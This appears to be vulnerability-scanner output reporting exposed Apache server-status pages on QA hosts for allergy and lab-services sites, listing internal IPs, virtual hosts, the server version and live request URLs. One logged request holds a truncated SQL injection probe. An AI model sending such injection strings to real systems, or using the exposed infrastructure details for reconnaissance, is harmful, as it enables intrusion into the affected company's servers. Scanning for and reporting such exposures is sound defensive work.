14-0301670/38/8066_ 0.1325708130340.00.87161.65 10.253.106.168http/1.1 15-0343815/83/7189K 0.236928028073910.08.06158.16 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/patient/europe/en-it/understanding-all 16-0301688/98/6368K 0.422705111219724180.73.3593.38 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /allergy/wo/en/allergen-fact-sheets.html.html?allergen=john 17-0301690/120/6360_ 0.50223114069280.04.34102.56 10.253.106.168http/1.1 18-0249870/85/7409_ 0.32295469173690.03.51132.28 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /content/experience-fragments/dm/fishersci/product_offers/w 19-0301700/64/7147R 0.33550128363430.03.62173.10 10.253.106.168http/1.1 20-0249890/40/6925_ 0.22542629433880.01.18110.87 10.253.106.191http/1.1 21-0301730/102/7019R 0.6152077888760.03.67101.79 10.253.106.168http/1.1 22-0302300/66/7109_ 0.355925110723650.07.25115.31 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/patient/europe/en-it/allergy-resources 23-02499045/95/5691K 0.601051486581273169.73.9085.45 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /phadia/wo/it/our-solutions/elia-autoimmunity-solutions/cel 24-0290970/122/6314_ 0.4810359910076380.01.37100.00 10.253.106.191http/1.1 25-0303030/73/5946R 0.2449808206070.01.28157.75 10.253.106.191http/1.1 26-083780/77/5795_ 0.3727006954040.01.42162.18 10.253.106.168http/1.1 27-0277424/131/6564K 0.53821483805716.33.10141.95 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 28-0308650/175/6228_ 0.771471868353470.01.55142.66 10.253.106.168http/1.1 29-04370/16/6969_ 0.05147147167720.00.17147.11 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 30-0-0/0/6006. 0.00906010339100.00.00107.39 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0279230/81/6024R 0.24409119109510.00.3986.69 10.253.106.191http/1.1 32-0324130/0/6271R 0.0056708208450.00.00102.22 10.253.106.168http/1.1 33-0838146/237/6439W 0.96009128833643.912.02117.98 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 34-0179562485/62485/62485K 61.374059699114728.5112.04112.04 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 35-0312170/85/6485R 0.35581127355460.03.6989.74 10.253.106.191http/1.1 36-0312180/33/7391R 0.13546129465080.01.56131.16 10.253.106.168http/1.1 37-0322860/41/6759_ 0.1368128662870.00.75149.69 10.253.106.168http/1.1 38-04380/64/6086_ 0.30149126364230.03.2091.61 10.253.106.191http/1.1 39-0322880/34/6596R 0.11550329964060.00.18135.87 10.253.106.168http/1.1 40-0-0/0/6242. 0.00920012015340.00.00182.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0324143/3/5211K 0.011521164040613.00.0175.38 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 42-02792913/40/6064K 0.1171511202852095.52.15161.70 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 43-0344012/99/6190K 0.432661193865781.11.33131.75 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0279310/118/6226_ 0.3026947376210.02.9876.24 10.253.106.191http/1.1 45-04391/53/5585K 0.20106448144805.50.84174.17 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 46-06050/60/5336R 0.265257817436450.00.66105.16 10.253.106.191http/1.1 47-050550/11/5746_ 0.0325629795570.00.0593.02 10.253.106.168http/1.1 48-0324180/3/5780R 0.00525416915770.00.01105.46 10.253.106.168http/1.1 49-06068/103/5619K 0.511831664282128.11.80102.63 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/filters 50-0279330/65/5297_ 0.42155606496240.01.00127.16 10.253.106.191http/1.1 51-06070/42/4883R 0.2252096630880.00.4585.44 10.253.106.191http/1.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c06f704b1
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 18-Jun-2024 16:05:40 EDT Restart Time: Thursday, 13-Jun-2024 12:38:57 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 5 days 3 hours 26 minutes 42 seconds Server load: 0.04 0.12 0.08 Total accesses: 517040 - Total Traffic: 7.6 GB - Total Duration: 54488158 CPU Usage: u40.46 s85.37 cu891.2 cs576.81 - .359% CPU load 1.16 requests/sec - 17.9 kB/second - 15.4 kB/request - 105.385 ms/request 28 requests currently being processed, 35 idle workers K_R_RRR___._KW.R_R_K_RRK___.._._.RKRR_R_R_R___R.RRR_._K_RK_..___ __.K_..............__._...................................._.... ._.............................................................. ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0175944441/44441/44441K 41.33213778481520.179.6179.61 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-034080/109/5094_ 0.40188145757960.01.16108.14 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-065470/37/5901R 0.15411149783960.05.4283.90 10.253.106.191http/1.1 3-071670/58/5207_ 0.19235169786400.03.68152.61 10.253.106.191http/1.1 4-0295090/57/5552R 0.1445704968800.00.16141.43 10.253.106.168http/1.1 5-0104540/68/4204R 0.31331126740980.00.9071.79 10.253.106.168http/1.1 6-0117240/65/5995R 0.38419955315520.014.13100.96 10.253.106.168http/1.1 7-0288560/1/5313_ 0.00255116969800.00.0080.67 10.253.106.191http/1.1 8-041220/16/5500_ 0.04154136595820.00.0792.54 10.253.106.168http/1.1 9-0117250/16/5568_ 0.13152126626870.00.1890.96 10.253.106.168http/1.1 10-0-0/0/5838. 0.00560010511070.00.00123.44 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0117260/28/4884_ 0.071372395274690.00.19117.85 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/onelambda/global/en/support/rss-feed.h 12-076368/82/4438K 0.2114957536324.00.59118.38 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 13-076378/63/5245W 0.46006877438.40.9997.65 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 14-0-0/0/6478. 0.0015305942030.00.00114.09 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-0295250/0/5414R 0.0057906164000.00.00122.49 10.253.106.168http/1.1 16-0304300/6/4862_ 0.0120147810200570.00.1776.49 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/patient/europe/de-de/allergy-types/sea 17-0288580/21/5266R 0.04420949808660.00.1281.12 10.253.106.168http/1.1 18-087020/176/5598_ 0.58152116912090.03.5279.15 10.253.106.191http/1.1 19-0295277/26/5491K 0.0754564265351.50.09126.34 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 20-0117290/46/5191_ 0.18251126358720.03.1765.94 10.253.106.168http/1.1 21-0102260/43/5643R 0.14438126377420.00.2283.70 10.253.106.168http/1.1 22-0117300/7/5336R 0.014191037248760.00.1389.81 10.253.106.168http/1.1 23-0295281/1/4513K 0.00152114870462.20.0069.52 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-059040/95/4886_ 0.3912208455790.01.1676.50 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/filters 25-0279960/2/4464_ 0.00114126118770.00.00119.32 10.253.106.191http/1.1 26-097260/94/4600_ 0.50115125280220.01.24128.52 10.253.106.191http/1.1 27-0-0/0/4927. 0.0013606651960.00.00115.40 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0-0/0/4873. 0.0011205634450.00.00117.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0103490/91/5601_ 0.33114145650520.01.4283.29 10.253.106.191http/1.1 30-0-0/0/4714. 0.0010906637790.00.0067.18 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0288590/20/4540_ 0.2613416926440.00.4661.67 10.253.106.168http/1.1 32-0-0/0/4839. 0.0011306845670.00.0075.77 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-024290/90/4887R 0.304191016522640.01.0888.55 10.253.106.191http/1.1 34-0179544440/44440/44440K 43.72504249681518.679.6179.61 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 35-0288620/1/5100R 0.00419145056100.00.0064.17 10.253.106.191http/1.1 36-0104590/35/5906R 0.10420827939260.00.1580.66 10.253.106.168http/1.1 37-0242490/0/5716_ 0.001206773060.00.00128.97 10.253.106.168http/1.1 38-0288630/0/4729R 0.0041904645000.00.0065.49 10.253.106.191http/1.1 39-059100/47/4973_ 0.154817805540.00.1974.40 100.70.4.142http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 40-0295290/0/4518R 0.0056507751040.00.00134.51 10.253.106.168http/1.1 41-0110550/48/3887_ 0.12300134350420.00.1158.90 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-059120/110/4634R 0.49362208763370.03.54114.99 10.253.106.191http/1.1 43-0110560/13/4793_ 0.05123777666100.00.2199.91 10.253.106.168http/1.1 44-0103550/94/4753_ 0.49251135166500.02.5559.63 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 45-059140/20/3905_ 0.12138116310060.00.2095.63 10.253.106.191http/1.1 46-0110570/6/3761R 0.02308124927670.00.1559.28 10.253.106.168http/1.1 47-0-0/0/4750. 0.0011108533360.00.0068.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0110580/42/4290R 0.385781874836950.00.8572.16 10.253.106.168http/1.1 49-0242630/11/4076R 0.03536174247930.00.0379.43 10.253.106.191http/1.1 50-0287410/46/3986R 0.25603114568000.00.5695.64 10.253.106.191http/1.1 51-0288640/17/3465_ 0.0913104593080.00.3254.81 10.253.106.191http/1.1 52-0-0/0/3975. 0.0015004009290.00.0066.30 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-0288760/39/3851_ 0.08297115144300.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c2755e18f
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 16-Jun-2024 10:26:15 EDT Restart Time: Thursday, 13-Jun-2024 12:38:57 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 21 hours 47 minutes 17 seconds Server load: 0.01 0.02 0.00 Total accesses: 351027 - Total Traffic: 4.8 GB - Total Duration: 35281014 CPU Usage: u36.01 s57.95 cu573.89 cs388.77 - .421% CPU load 1.4 requests/sec - 20.0 kB/second - 14.3 kB/request - 100.508 ms/request 39 requests currently being processed, 34 idle workers KR___KK____K_KK___KR_RWKRKK__.K_KRK_K__KKKKKRK._____K____K.KK___ _..R_K......_..RK_RK.RR......................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0175925124/25124/25124K 23.52702152646043.844.9644.96 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-0324940/119/3381R 0.29351133306740.00.3475.29 10.253.106.191http/1.1 2-018140/66/4130_ 0.1667107086170.00.2960.65 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-056760/192/3525_ 0.75185117424900.03.00108.02 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-034640/58/3799_ 0.16296413246430.00.2788.98 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base.min.css H 5-020104/120/2831K 0.861735852013822.71.5946.09 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 6-03272918/172/4498K 0.462741435150496.01.9648.88 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-018150/84/4044_ 0.191019535671310.00.4754.93 10.253.106.191http/1.1 8-055260/47/4198_ 0.1267115215010.00.7168.97 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-034820/78/3732_ 0.192659603880200.00.2661.38 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-087200/300/4032_ 1.2429505386220.018.9571.44 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/components/allergen_fact_sheet/clie 11-01069344/154/3349K 0.42173131306901286.60.9473.97 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.js?v= HTTP/1 12-0296390/79/3160_ 0.19139144250280.00.3366.18 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-0378622/115/3705K 0.4714536459292613.11.0875.12 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-03273227/167/4927K 0.92251244104961.72.1351.01 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-020110/158/3924_ 0.4312623690730.02.0663.87 10.253.106.168http/1.1 16-026780/96/3444_ 0.18244175276680.00.2347.72 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-026800/55/3580_ 0.1010107288580.00.2945.85 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/js_cookie.min.js 18-0115782/168/3679K 0.4568124137784.71.4640.56 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-054560/136/3983R 0.583841044231190.01.6265.62 10.253.106.168http/1.1 20-020120/179/3743_ 0.51187114120660.01.0345.67 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-037870/87/4113R 0.20456124465570.00.2545.76 10.253.106.191http/1.1 22-0282145/96/3523W 0.210046245594.10.3455.43 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 23-0296310/188/3151K 0.533001228699222.73.8449.41 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-037880/30/3560R 0.06612113905240.00.0756.03 10.253.106.191http/1.1 25-0379412/71/2981K 0.16173134421896163.80.2998.09 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.css?v 26-01158457/216/3084K 0.7610313366437341.93.3838.63 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-083360/0/3235_ 0.0017304621860.00.0034.50 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0289780/266/3217_ 0.9610103299050.05.3378.33 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-site.min.css H 29-0-0/0/3774. 0.0073503657590.00.0065.29 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0979726/113/3253K 0.3101226840459.50.4735.20 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0296410/90/2823_ 0.1926510654010510.00.8438.58 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-0380635/129/3532K 0.47149198473567624.10.8456.73 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-018160/48/3618R 0.09568124788320.00.1667.20 10.253.106.191http/1.1 34-0179525124/25124/25124K 24.68002400846044.144.9644.96 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 35-0296420/116/3700_ 0.26192123291930.01.2737.54 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0201825/135/4446K 0.681051150596757.12.5841.02 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-0106940/127/4049_ 0.64265614829600.03.3598.81 10.253.106.191http/1.1 38-028220/26/3214_ 0.052651222971210.00.0641.67 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0268126/110/3635K 0.25201335240169.80.2744.20 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2024.4.19. 40-0380710/113/3420K 0.401021251879722.90.6963.72 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0979820/85/2492K 0.22102927304347.10.3331.97 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-02904030/195/3347K 0.561371567421968.51.3233.83 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-01069959/146/3812K 0.54413560832139.60.9278.01 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-038080/27/3396R 0.06602123972890.00.0640.49 10.253.106.191http/1.1 45-028238/9/2626K 0.021621442595559.80.0673.08 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.mi
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cfe2b3cbe
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 12-Jun-2024 07:29:30 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 35 days 17 hours 29 minutes 41 seconds Server load: 0.00 0.00 0.00 Total accesses: 4798337 - Total Traffic: 33.0 GB - Total Duration: 328071986 CPU Usage: u47.48 s234.04 cu5820.69 cs5780.51 - .385% CPU load 1.55 requests/sec - 11.2 kB/second - 7.2 kB/request - 68.372 ms/request 31 requests currently being processed, 30 idle workers RR__K.._K_R.K_._R_R_._._K.._.R_._RRK._W_RRKR__RK___KRKR.__RRKRR_ _R._._._._....K._.._............................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-037760/1/50981R 0.002644239705880.00.00299.15 10.253.106.168http/1.1 1-0302740/3/51523R 0.00228035156150.00.00347.36 10.253.106.191http/1.1 2-0302750/2/133789_ 0.001411134146980.00.02468.09 10.253.106.168http/1.1 3-023300/0/50728_ 0.001044785180.00.00403.74 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-02349650090/50452/91924K 46.9361364431792419.592.08435.69 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0-0/0/60315. 0.00102038133380.00.00765.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-0-0/0/48611. 0.0095038049210.00.00604.20 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-012100/0/49802_ 0.0091041450200.00.00379.76 10.253.106.168http/1.1 8-0288121/21/52409K 0.075041381181.20.21449.64 10.253.106.191http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 9-012110/0/55721_ 0.0091037479110.00.00339.98 10.253.106.168http/1.1 10-013940/4/50559R 0.01238840446820.00.04599.54 10.253.106.168http/1.1 11-0-0/0/61237. 0.0094031454190.00.00328.91 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0318662/2/49950K 0.00233340585242.20.00442.20 10.253.106.191http/1.1qa1.allergyinsider.com:80POST / HTTP/1.1 13-0302760/14/50843_ 0.02141034167690.02.56337.00 10.253.106.168http/1.1 14-0-0/0/53197. 0.0088043198410.00.00519.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-0302840/5/60360_ 0.01168637541090.00.01432.66 10.253.106.191http/1.1 16-0313060/1/98366R 0.00541240851940.00.00385.56 10.253.106.191http/1.1 17-0302870/12/49947_ 0.06104736364260.01.90361.26 10.253.106.191http/1.1 18-0322250/36/44225R 0.351881231370420.01.04362.63 10.253.106.191http/1.1 19-0272740/25/49951_ 0.11844137817530.00.52490.61 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /allergy/it/it/allergy-types-symptoms/seasonal-allergies.ht 20-0-0/0/46789. 0.00100039134990.00.00394.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0314270/20/52193_ 0.071042443472150.03.64334.21 10.253.106.191http/1.1 22-0-0/0/48864. 0.0093035954850.00.00420.74 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0290430/38/47315_ 0.354539836743860.01.76414.73 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/handlebars/compiled/templ 24-0313112/4/47991K 0.0054234380601.70.01353.60 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 25-0-0/0/49463. 0.0098039149230.00.00372.30 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0-0/0/49742. 0.00103037515460.00.00414.28 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-0298540/18/85350_ 0.051035839595760.00.16382.87 10.253.106.168http/1.1 28-0-0/0/49884. 0.0087030792510.00.00316.93 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-0311540/15/46323R 0.211881039800590.00.54436.54 10.253.106.191http/1.1 30-0298930/1/50764_ 0.0010420444437650.00.09386.46 10.253.106.191http/1.1 31-0-0/0/46810. 0.0089029621350.00.00399.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-0139870/14/47607_ 0.1510310233509700.00.80326.34 10.253.106.191http/1.1 33-0313140/0/212741R 0.00541014665240.00.00458.69 10.253.106.191http/1.1 34-018710/0/46978R 0.00395037493630.00.00269.15 10.253.106.168http/1.1 35-0318702/4/47814K 0.0251581476020928.40.06315.91 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /allergy/wo/it/allergen-fact-sheets.html HTTP/1.1 36-0-0/0/44433. 0.0099039072450.00.00284.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0298950/2/126406_ 0.00104923813630.00.00343.08 10.253.106.191http/1.1 38-0302288/78/43236W 0.400033061898.41.37357.29 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 39-012130/3/43373_ 0.004515133167740.00.05317.47 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.css?v 40-0290440/2/44516R 0.00255832148640.00.01351.74 10.253.106.168http/1.1 41-018720/0/45600R 0.00394034971430.00.00317.59 10.253.106.168http/1.1 42-0313165/5/45082K 0.011480362985370.30.07405.47 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /allergy/it/it/living-with-allergies/_jcr_content/root/resp 43-014020/4/41797R 0.012552930739330.00.02351.94 10.253.106.168http/1.1 44-014030/19/43239_ 0.07104729459040.02.00378.74 10.253.106.191http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.html HTTP/1.1 45-0274060/4/44274_ 0.011029938536110.00.11429.51 10.253.106.168http/1.1 46-0290450/27/42351R 0.082281331547580.00.34325.62 10.253.106.191http/1.1 47-018731/1/45143K 0.00731430552812.30.00335.32 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 48-0139900/7/40074_ 0.02104430925990.00.38331.98 10.253.106.168http/1.1 49-0299080/3/46421_ 0.014510232166320.00.02264.71 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 50-0318750/0/41704_ 0.0045037300980.00.00326.07 10.253.106.168http/1.1 51-0318762/2/42875K 0.0015303662796121.00.12365.14 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/isotope.min.js HT 52-018880/0/44072R 0.00370034235490.00.00428.80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c7d6a6f5d
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 10-Jun-2024 06:48:48 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 33 days 16 hours 48 minutes 59 seconds Server load: 0.00 0.00 0.00 Total accesses: 4576752 - Total Traffic: 31.2 GB - Total Duration: 307583356 CPU Usage: u45.14 s209.89 cu5513.28 cs5511.66 - .387% CPU load 1.57 requests/sec - 11.2 kB/second - 7.1 kB/request - 67.2056 ms/request 41 requests currently being processed, 33 idle workers WR_RK____KRK._R.K__R_RRKKKKRR_R__K_RKR______R_._R_KK_K_R__K_KRRR K_.R.......K._K...._.KK_....._R._............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-01578410/25/48699W 0.0600363810710.70.15267.90 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 1-0191360/17/49423R 0.033841232302450.00.22327.23 10.253.106.191http/1.1 2-0230240/2/131379_ 0.00255130212240.00.18432.14 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /api/search/attribute?versionid=*&tf_version=%27+and+(selec 3-0264190/59/48371R 0.403553941946230.00.85371.96 10.253.106.168http/1.1 4-02349632566/32928/74400K 29.9530362779360083.660.50404.11 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0185100/31/58090_ 0.05124036319850.00.14737.16 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/dam/diagnostics/components/content/allergen-fact-s 6-0191370/11/45979_ 0.03111336639240.00.07592.46 10.253.106.168http/1.1 7-0174950/38/47175_ 0.08183839660170.00.09348.32 10.253.106.191http/1.1 8-0218740/139/49978_ 1.001931138587050.02.60428.79 10.253.106.168http/1.1 9-0185113/24/53438K 0.071431234624138.00.10325.22 